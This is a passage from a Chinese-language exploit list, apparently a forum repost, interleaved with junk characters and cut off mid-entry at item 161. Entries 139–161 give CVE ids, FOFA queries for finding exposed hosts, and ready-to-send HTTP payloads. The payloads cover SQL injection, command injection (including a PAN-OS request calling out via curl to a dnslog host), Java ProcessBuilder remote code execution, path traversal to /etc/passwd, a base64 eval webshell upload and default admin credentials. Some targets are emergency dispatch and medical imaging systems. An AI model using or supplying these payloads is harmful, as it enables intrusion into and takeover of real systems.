139. 福建科立讯通信指挥调度平台editemedia.php sql注入
# i! x5 z% \' m) dCVE-2024-2622
_, F/ [. P; s* ]FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 @9 H9 Z8 X, Z. d; ]GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.15 A4 x- G# @& Z, k- \" O% w( A5 t
Host: x.x.x.x) Y4 Y6 M) N3 v! J1 D9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 Y0 y" C* T. d* [3 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( R" ?4 h e4 N' [& b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! b& F0 y9 {2 ?, {' d- IAccept-Encoding: gzip, deflate, br
$ @$ h, |& a4 K nConnection: close' O* D0 o. z. P$ g7 V$ M8 a
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Y w) ]$ i* R# F3 a" h' h1 _Upgrade-Insecure-Requests: 1 D% v; n0 X* A0 Y! ^+ I
- @# ?# p$ s6 n& H! t& u- N4 U& W
z9 T/ ~) m. w$ L; }& r140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入! y5 l$ c1 z; h& E
CVE-2024-2566' b! _6 i1 f4 R# j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台", a' e0 M& E" x
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1/ r1 y7 [: q( J; K7 Y u
Host: x.x.x.x
( ?( c7 u* E2 N i0 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 V) P) o& e/ X5 |7 r% V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 B# ?; X" O4 U. H" H$ v, m$ f2 o$ s! Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" I+ L, }4 ]5 e) E. c
Accept-Encoding: gzip, deflate, br& V- L* |7 p$ b- x+ d. a# b
Connection: close1 R) o6 z4 h' k
Cookie: authcode=h8g92 ]# [1 T5 t1 R& Q3 I" F
Upgrade-Insecure-Requests: 1
) \9 n9 K8 o- [4 r; p( _4 w/ p' J; o
( B9 v5 \5 [, {; G; S$ V" z141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
6 I% `& c( W* j6 f+ P3 ]FOFA:body="指挥调度管理平台"
$ u$ \# Y3 _8 M5 v5 f& VPOST /app/ext/ajax_users.php HTTP/1.1- b' D- x& p4 L3 }7 ]
Host: your-ip/ {( N. \2 w( ]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info1 v5 V8 G( y$ N. e7 h* f
Content-Type: application/x-www-form-urlencoded2 V, ?* \; _9 Z( N5 @
. {) |0 |, l$ Y+ z" p
" a+ Y8 j/ f* q1 ]9 {dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -+ e0 f, w% L$ z& H! ~( B
" B3 i1 [& o( [% q; ]
* y: k( m& |/ P1 v
142. CMSV6车辆监控平台系统中存在弱密码
9 v7 G! n; e8 x1 y0 W3 }CVE-2024-296660 a! ~4 l; O3 L7 z. r5 }! f9 C
FOFA:body="/808gps/"
" r2 M/ w" d) n; Eadmin/admin
! u( B s a9 Z/ `; B143. Netis WF2780 v2.1.40144 远程命令执行
) Y$ y+ O, x# l" b1 XCVE-2024-258502 X% H8 p( K9 l+ o% g
FOFA:title='AP setup' && header='netis'
3 W( c- l( F; ^0 V+ t2 aPAYLOAD
1 G+ a9 c, B4 W D: u
) B6 f1 K' Q* @2 q144. D-Link nas_sharing.cgi 命令注入
) N6 C @0 w, M: T8 M0 T; RFOFA:app="D_Link-DNS-ShareCenter"9 c+ J+ L6 J, @) C- f. M8 i
system参数用于传要执行的命令% u, s) }3 m$ l9 D4 Z
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1: Y5 \$ |) b+ K A& r0 N
Host: x.x.x.x
8 y2 l/ Y6 L; Z8 M) Z; a: XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' f+ T j3 u. x# c- ~5 b
Connection: close
. {$ r* a! S' x+ r7 E3 Z. [Accept: */*; b0 U- ^2 ~2 f ^ D/ x/ Q
Accept-Language: en- J6 H% x4 C3 `& I3 ]
Accept-Encoding: gzip: p/ {" a6 n4 k( a
4 P" d( k( o" r3 y
$ X- g; h" k; C1 l+ }/ b- K4 K) M
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! R5 O u, ?# r$ R4 S. b
CVE-2024-3400
) c6 |7 o; [1 p* D+ B! M8 dFOFA:icon_hash="-631559155"6 @6 [( r4 w3 G9 S
GET /global-protect/login.esp HTTP/1.10 q9 c+ D' I& P v8 G2 B
Host: 192.168.30.112:1005
& q6 I) {/ L$ G. S( V; }. HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.844 j- B2 A& h1 b+ y9 ~/ i7 E9 W
Connection: close
4 S8 ]+ N/ p& Q% d8 P3 x' h7 vCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;) d) b) u/ \; _5 h
Accept-Encoding: gzip
, j+ r* |) I0 d4 I2 W( U) c. |
, W+ c: G* Y ^$ G3 s6 [( N/ f1 {2 y( z$ I+ t
146. MajorDoMo thumb.php 未授权远程代码执行3 ^$ p8 y' d! J% v, L
CNVD-2024-02175
' i) H: ^4 ?, w8 OFOFA:app="MajordomoSL"& x3 T! ~8 U4 r
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.14 r7 q" M4 O, G z
Host: x.x.x.x! X# i: G4 {) H: D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 K$ Q( A% r- U4 ^Accept-Charset: utf-8
' X" ~( X/ s% b3 oAccept-Encoding: gzip, deflate
- S, ]& x; U$ o6 R& x. d0 D0 KConnection: close6 i4 E* L& ]0 ~
( J2 A8 \/ p# h, m$ x6 Z9 Q7 K1 R
0 [) S- N. H8 x% M( M
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# l ?6 V2 E: R0 JCVE-2024-32399
. l5 d6 q" F. ~# i) [1 V$ d6 VFOFA:body="RaidenMAILD") N( O+ X6 {5 N' i
GET /webeditor/../../../windows/win.ini HTTP/1.1
6 t! C$ |6 N& w, I4 J4 x( EHost: 127.0.0.1:81! Y. J1 J4 c, R) o; u" H
Cache-Control: max-age=0
6 l* v. A7 h! l6 X$ U( XConnection: close
$ D6 M7 G2 D& j8 n& d
& R4 u* q* K( g% E
3 I/ A- ?& D4 |' V148. CrushFTP 认证绕过模板注入5 F' X! s; j$ r& O
CVE-2024-4040+ [, f; |4 Q/ L l+ `8 j0 ?8 j
FOFA:body="CrushFTP"6 u) l0 }/ R8 I1 j8 K
PAYLOAD" y% {7 E% U( x! i+ o
" S: I* j# y6 ]1 @
149. AJ-Report开源数据大屏存在远程命令执行
) r7 B: O( D, P- f7 j! {8 g. PFOFA:title="AJ-Report"
8 ^0 M5 C, t& @5 D0 J
+ n' V3 s0 t n* x8 }) IPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' Q* G4 B: d# f- ]! ^2 [Host: x.x.x.x9 ?; Q2 v& f, X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
p0 [( G% l- U& X6 ^# n2 ?7 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! o; j# R9 b5 C" h' h. t0 x% n
Accept-Encoding: gzip, deflate, br
; _3 T. w) p* k5 K7 |1 d# vAccept-Language: zh-CN,zh;q=0.9
! ^5 `" r! i# s- ]Content-Type: application/json;charset=UTF-8
6 i, s, c* o$ P0 _0 s2 XConnection: close
' ]4 P# o1 \/ G2 y ~9 ^4 d/ q
# l7 g4 r0 {9 M' b+ ~{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}9 U% C6 {# O# g2 e* b% i4 I& d
0 E; `# h9 ~" M150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 M, A0 |4 a/ x0 q* P6 C @# VFOFA:title="AJ-Report"2 m/ |1 J7 E7 H- o
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
; u! g) e2 Y4 X: e V, N' E4 P& oHost: x.x.x.x
% ]* ^. q9 v4 ^. W% V# F6 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ S q2 Q8 k; E, }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 T; C: [6 L, ?' u5 T9 jAccept-Encoding: gzip, deflate, br
- k1 J" V" y4 H' tAccept-Language: zh-CN,zh;q=0.9
# D5 Z' E; k' R$ {3 x& PContent-Type: application/json;charset=UTF-8( o$ C2 M0 X& Y1 v! o* ?) D
Connection: close0 e' P4 Q) ^- h' i( g! @) a N; I
Content-Length: 339
6 y0 _9 a8 x* ? n. H0 P% f7 C7 x$ d: a: r4 r; k
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
& K! |% `! k$ E7 k" x" A3 }7 ~
( H9 p) f& A+ O$ v) p. T
% x: `) X, W' n8 H% f151. AJ-Report 1.4.1 pageList sql注入# g, U) s% n+ s/ b* l6 b2 I$ ?
FOFA:title="AJ-Report"
- |: w }% j5 d- HGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' c' R8 m! u& |; E* \" VHost: x.x.x.x
" j- }# N \' d% v0 }! w4 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 A1 a9 F7 t+ D9 d* i5 CConnection: close
( m! i) V S7 f! e6 {& C9 ^Accept-Encoding: gzip
/ L& }3 Q2 x! |# [& m+ H. v2 O% b0 ^3 X% k) Z
7 C1 w) x7 }# m; u: P8 x0 T
152. Progress Kemp LoadMaster 远程命令执行
3 {& L2 |7 ?" Z5 \5 xCVE-2024-1212# A( D& ]/ \$ y
LoadMaster <= 7.2.59.2 (GA)* D& a! r6 h% x3 V% P" K' j
LoadMaster<=7.2.54.8 (LTSF)% V. G7 q4 G# A7 P
LoadMaster <= 7.2.48.10 (LTS)' _* z. X% `, ^& ~8 y$ d) J
FOFA:body="LoadMaster"' k; p- n- S) S% Q# e
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码+ V8 C8 M1 x# @6 r1 k* c
GET /access/set?param=enableapi&value=1 HTTP/1.1% W& r- I5 g c$ _& F
Host: x.x.x.x! K8 ~. z5 ?7 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1) l2 k- n, b- ?& I
Connection: close8 S4 W- ]7 i h4 B! j7 Y j
Accept: */*
' C: `3 g. w, F" y; V- a% |Accept-Language: en% x( L% J8 E1 T" b% m& w: U
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
6 M9 v! Q5 K( N, u5 Z$ z: L+ wAccept-Encoding: gzip
: N( m$ M9 m; u, S2 E2 [* y/ x1 Z
; s+ {: T1 |9 h0 W' @
153. gradio任意文件读取3 I/ l$ }7 [9 c0 x
CVE-2024-1561FOFA:body="__gradio_mode__"
, B' e t- e/ F8 R0 v, Z" W4 z8 H7 @第一步,请求/config文件获取componets的id
8 d. d6 g" ?' qhttp://x.x.x.x/config
/ d4 `& m+ d* D& M; F' R1 ^6 t- r# w/ y" a
2 h. y5 n4 f( |" I2 T$ t9 a3 b第二步,将/etc/passwd的内容写入到一个临时文件
' B( U+ V! F: j( a; {POST /component_server HTTP/1.1( d- u+ y# Q; X0 q# S; t; H
Host: x.x.x.x1 q& q5 k1 ?8 T$ d- {6 o& x) Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3; g6 I0 E3 }/ i, s% [. P/ R# V: D
Connection: close
9 F2 {8 o' i: s9 C9 l4 ]8 VContent-Length: 115
$ \1 Z Q# {2 i' m/ V7 nContent-Type: application/json' X: z: l/ y( {; n _; a& D+ t
Accept-Encoding: gzip
' |# j) Q$ L, O% W0 P( o3 x+ ]0 s, s$ B7 n7 }9 ?
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
8 l5 n# M( w. q1 P
& T$ P e5 _$ [1 Q
5 U' X4 v& R0 L: s; G# g2 g9 J第三步访问. O8 @+ }7 {4 V9 g: c
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd- Z0 k1 O$ M. s/ w! c+ i: o3 K+ k
' u7 z/ X; _) t* d
- `. ~6 C) k! J3 V+ Y, j+ C154. 天维尔消防救援作战调度平台 SQL注入
- q5 \0 D# S; h- BCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
9 [0 w3 T- i+ A0 s. K! U3 c1 r4 Y" oPOST /twms-service-mfs/mfsNotice/page HTTP/1.1- |& f& E0 W E. r: c; X
Host: x.x.x.x
6 K# ^( N4 D' ~) M$ Q) j# lContent-Length: 106
0 X0 C+ k' t* @) v! BCache-Control: max-age=0
5 T# U# Q( g! w- yUpgrade-Insecure-Requests: 1
5 q# n5 K5 ~3 W& E! tOrigin: http://x.x.x.x
5 U2 Z5 u, h: H2 G3 M* [' I5 S3 VContent-Type: application/json
! ?7 X0 C- K5 S- C w" ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
7 G6 b% K7 e7 o$ W) P2 b( L) ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ n4 j U5 ]7 U% w3 R8 PReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page8 f: T' ?. e% F$ S8 O3 \, o5 i8 s8 X5 C
Accept-Encoding: gzip, deflate
% M6 F! p; s) z, TAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.77 ~4 C6 m4 M3 x
Connection: close
+ _) `; \% Z7 V# N: J8 Z0 [
: y/ c6 n7 V& \1 X0 D{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}% T2 Z* T6 s5 {% C
$ k0 B3 _0 r6 p$ e' n7 N0 t* [3 B4 G. i
155. 六零导航页 file.php 任意文件上传1 o# e: o4 w; |
CVE-2024-34982
4 Z- h5 z# d# H/ p; T5 _* l% MFOFA:title=="上网导航 - LyLme Spage"' ~2 y+ u* s+ u% Q1 M5 X
POST /include/file.php HTTP/1.1
) v4 X8 N9 l& y, x4 W5 HHost: x.x.x.x4 U- C, ` p4 ~# c9 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 V% B+ c- P9 o) X+ `, U5 |( V; ?
Connection: close
- i1 O7 P! U: e l0 u. AContent-Length: 232! ~5 E' g$ p: N- O \/ x( D/ d
Accept: application/json, text/javascript, */*; q=0.014 q5 `6 Z+ l) ]1 y# [7 t4 g" w. _
Accept-Encoding: gzip, deflate, br, x& \, p) Q1 E& s1 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# \2 L8 u" V, {9 xContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f! U( z. i0 N! P+ V8 G0 r5 t
X-Requested-With: XMLHttpRequest/ m! _- G5 N, B6 \% U" \+ y9 E! V Z
9 Y; ^2 A: A" B( D' o3 l( x8 z9 ?9 n-----------------------------qttl7vemrsold314zg0f7 V2 s+ m( h: I! n: |6 B, i
Content-Disposition: form-data; name="file"; filename="test.php"
5 R2 P* F" R" }Content-Type: image/png
. ^7 F: \5 E$ P/ ]; ]6 D, h% J9 l8 X7 B" t2 S- R7 J( }. f5 i% A2 e
<?php phpinfo();unlink(__FILE__);?>- B1 m- @- u `& A; ?
-----------------------------qttl7vemrsold314zg0f--( n( Q0 P" j- H& P" J
$ a5 y% r1 ^7 ?& B" q9 p+ [) C0 h
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php1 i% ~# {/ F: w& S: y* U0 s
+ {! L m5 e/ J! t+ B
156. TBK DVR-4104/DVR-4216 操作系统命令注入: ]4 E( C5 V0 S
CVE-2024-3721* t* k' U4 ]$ D! M5 p
FOFA:"Location: /login.rsp"5 {" ?+ o5 s* {. G3 F
·TBK DVR-41048 l6 i2 @6 Q; [! V7 E
·TBK DVR-4216( Z! O9 p9 @. l) Q9 r6 \
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& C% ?9 f0 H6 i7 m; _
( h. U) V% V0 m& Z
6 u0 L) w; \2 d: DPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.15 e' V: @) @4 T$ e9 M6 ~
Host: x.x.x.x& C& P5 e5 F/ k" j3 |5 o
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" L& R( n- D4 ]5 j: e$ E' KConnection: close
0 f) n4 g$ i7 O' S& L) iContent-Length: 0
' Z& A, k% j/ ?$ l9 i- v$ pCookie: uid=1
+ C# B. | S& M! O/ E/ fAccept-Encoding: gzip
( N5 m# C1 l9 p8 h6 D" {/ G' o4 m) j4 C& C9 D
, u# h0 O. {) e v* x
157. 美特CRM upload.jsp 任意文件上传
8 j8 M, z' B( i. v. E. Z0 @: RCNVD-2023-069717 l! \; a% T- z9 H3 }
FOFA:body="/common/scripts/basic.js") O2 T) l& o1 j) s, H
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* i$ ~( P- S9 `- ~* lHost: x.x.x.x7 Y6 F( `8 E- _ q3 [. \: ~4 x; |3 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
; B4 R" _, X4 ~ m% ~2 _% p7 aContent-Length: 709! i% x8 k) k: W0 U" o* B; F+ P( x& k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 a( A6 Z( t* O6 g4 F2 @( jAccept-Encoding: gzip, deflate6 q% z! U5 o' k# F; ?
Accept-Language: zh-CN,zh;q=0.9
\: S. T5 \9 ?# h, v" }: b3 iCache-Control: max-age=0
9 _ B$ ]1 {2 ^9 |9 z9 _$ uConnection: close+ w4 ?3 i- G+ T% z* V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
$ n5 C y. M( {9 LUpgrade-Insecure-Requests: 1% h w0 |9 t" ?0 x
; u: W0 D8 D o7 V p0 | ^------WebKitFormBoundary1imovELzPsfzp5dN
0 e0 ?) |1 N. x/ v) P' gContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
: ?, H3 h/ a# [+ ]/ {. M; F$ p; NContent-Type: application/octet-stream" }9 c* r1 _2 J4 g* H
9 b% \: l8 I+ K; O5 [nyhelxrutzwhrsvsrafb
; O( c& Q2 r* Z$ J5 F( x/ P! V' \/ U------WebKitFormBoundary1imovELzPsfzp5dN
! q! P" h8 T4 K8 x6 s3 qContent-Disposition: form-data; name="key"
3 _! \6 {9 K3 A+ a" B- t3 z Z
2 i/ ]- S/ @9 F, i+ ~2 d! Qnull
" a: O+ L9 p) M------WebKitFormBoundary1imovELzPsfzp5dN. ]* E8 J5 N* n5 O/ \- z
Content-Disposition: form-data; name="form"$ J9 K+ r- h8 q& b
+ M/ t- C0 N$ P. H2 m4 a9 ~
null: |3 C* V( _1 n. W" V6 }/ H5 u3 G) j8 N
------WebKitFormBoundary1imovELzPsfzp5dN
* x5 I4 d4 e6 a, m6 M& b# v; m- SContent-Disposition: form-data; name="field"
. k* L: c# a4 g* n
7 l0 Z5 \" P: z3 wnull6 |& [6 P+ K! d! p' Y% ^2 c. \
------WebKitFormBoundary1imovELzPsfzp5dN) r8 B/ D5 `4 m: K/ C: i) f
Content-Disposition: form-data; name="filetitile"3 H& q3 D0 X! b8 R/ ?' u
" \1 e: N) ?8 _- s* I: D, Inull
3 @+ E0 m' P' g" a$ e, g3 @------WebKitFormBoundary1imovELzPsfzp5dN
/ J* B) I4 c5 ?! G, R4 S3 VContent-Disposition: form-data; name="filefolder"
* z2 Q- ^ i) }6 R% }
% r& O$ L5 u' j: W* O, Y2 Hnull7 C+ i* j5 y& U# V+ L3 Z4 g1 p& d6 x
------WebKitFormBoundary1imovELzPsfzp5dN--; _6 {% ^+ m) f* s& u
# }/ Q, J3 \: M# ^& X& q: a$ {0 M0 |$ x8 v7 ]
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp$ D+ d. G0 ^1 f. v" Z; H
U! ^7 o- @! a% K) }
158. Mura-CMS-processAsyncObject存在SQL注入( S8 [7 h! p% `$ z. ~' V2 @
CVE-2024-326407 u8 ^* E- R' I: `! Q
FOFA:"Generator: Masa CMS"% |0 i! t8 Y9 A5 \: t# c
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 G. T, |9 `8 P* O" l0 u0 w
Host: {{Hostname}}9 Y$ x4 E$ c& Y
Content-Type: application/x-www-form-urlencoded
: v1 }, {* l$ V0 {: `% T9 W9 J% C" _- T' ^. P
object=displayregion&contenthistid=x\'&previewid=1$ |5 ]$ v# m( i0 w2 _7 l: R) v( L# x
2 W! f, g/ }' t6 H9 O* w
I1 G) D6 a# |0 v0 v W159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
: ?) D: A' B, C* h. Z* I1 hFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
4 U( o# n6 v% f i/ y9 APOST /webservices/WebJobUpload.asmx HTTP/1.1# u( k: c& W+ v: O0 r
Host: x.x.x.x
4 u# d5 g' x, f' v! OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
; n3 ?1 J4 n V& T* X- N" O, cContent-Length: 1080
5 b- E% m$ t% V$ Y" XAccept-Encoding: gzip, deflate
. | @/ t: \5 Q! QConnection: close
" H7 o& ]; n6 Y" B$ gContent-Type: text/xml; charset=utf-8
4 p# q3 d8 R3 e% PSoapaction: "http://rainier/jobUpload"
6 x1 o) Z' } V) |$ N2 {$ z1 c; c5 K; u/ @, T
<?xml version="1.0" encoding="utf-8"?># Y- \$ }9 Q: c$ [4 y$ S2 _/ D1 a
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
G' `0 h6 F8 F" [& Y6 B: {<soap:Body>7 H) C* \# G l9 s) s$ N7 \' F3 T
<jobUpload xmlns="http://rainier">' k- E( M9 y* }% I
<vcode>1</vcode>4 C3 Y: Q5 ^# d
<subFolder></subFolder>
4 M [; H6 {' ^( K3 {<fileName>abcrce.asmx</fileName>
; ~) L2 j: A V! I. w2 w |4 @<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
& R' R( J0 g+ Q</jobUpload>
4 M' t5 J4 O' A</soap:Body>
9 U, C7 m# E5 i2 Y. d, q) |</soap:Envelope>
/ P0 l p8 w. I* ?# K' c$ i- z3 g! |0 c8 G G- Y
! }9 Z' @6 l9 q
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
, I; z, ?" y& N/ ~4 k. h" `& O( x6 Z3 s8 S
& {- `) l4 u) ]: `160. Sonatype Nexus Repository 3目录遍历与文件读取0 p; b3 c1 h- d/ P, [7 \$ j
CVE-2024-4956* Z! o% |8 O9 _( e6 s+ H1 Y7 {1 A/ t
FOFA:title="Nexus Repository Manager"
. ]; {, g) @) @( C: ~5 H! t& z) JGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
N; H! h4 ?" D- W! g5 uHost: x.x.x.x
) `# X- A& Y2 U1 E k; BUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
5 Z% b b, T2 Z- H0 c3 q8 Z' SConnection: close
. ?4 b/ g7 U" N5 x7 f% t& _0 a- eAccept: */*
8 i8 n. N! H2 ^- ^/ p: UAccept-Language: en( d+ B" L# p& i) C; B
Accept-Encoding: gzip6 i. m, p) [% d- o1 J
0 g+ Z2 B# u- p$ u# `/ f2 p
, D! A" G+ f/ d6 x8 ]" f161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
& R. B% J5 a2 ~5 i% rFOFA:body="/KT_Css/qd_defaul.css"7 J. j6 @; C/ ~6 c* R8 k
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
. E5 n5 x, l$ ?' [ IPOST /Webservice.asmx HTTP/1.1% C1 r2 {' z+ C- \7 U5 H$ h
Host: x.x.x.x
& r5 |: \- }! o( NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
2 C8 Y$ U9 f7 j5 X, YConnection: close/ t. {3 J( \3 }# Z% V# o
Content-Length: 445
' _* u% r1 P4 \! b* @" NContent-Type: text/xml1 D1 K' m6 d7 i3 m% H" |
Accept-Encoding: gzip1 `# s4 b# F/ W- u) `6 g6 p
( |& n) [8 F/ _% s<?xml version="1.0" encoding="utf-8"?>
4 p) s9 R1 K4 o0 D, Q% Y- G<soap:Envelope xmlns:xsi="2 Y. e+ s4 y/ X9 {0 }( M; ~
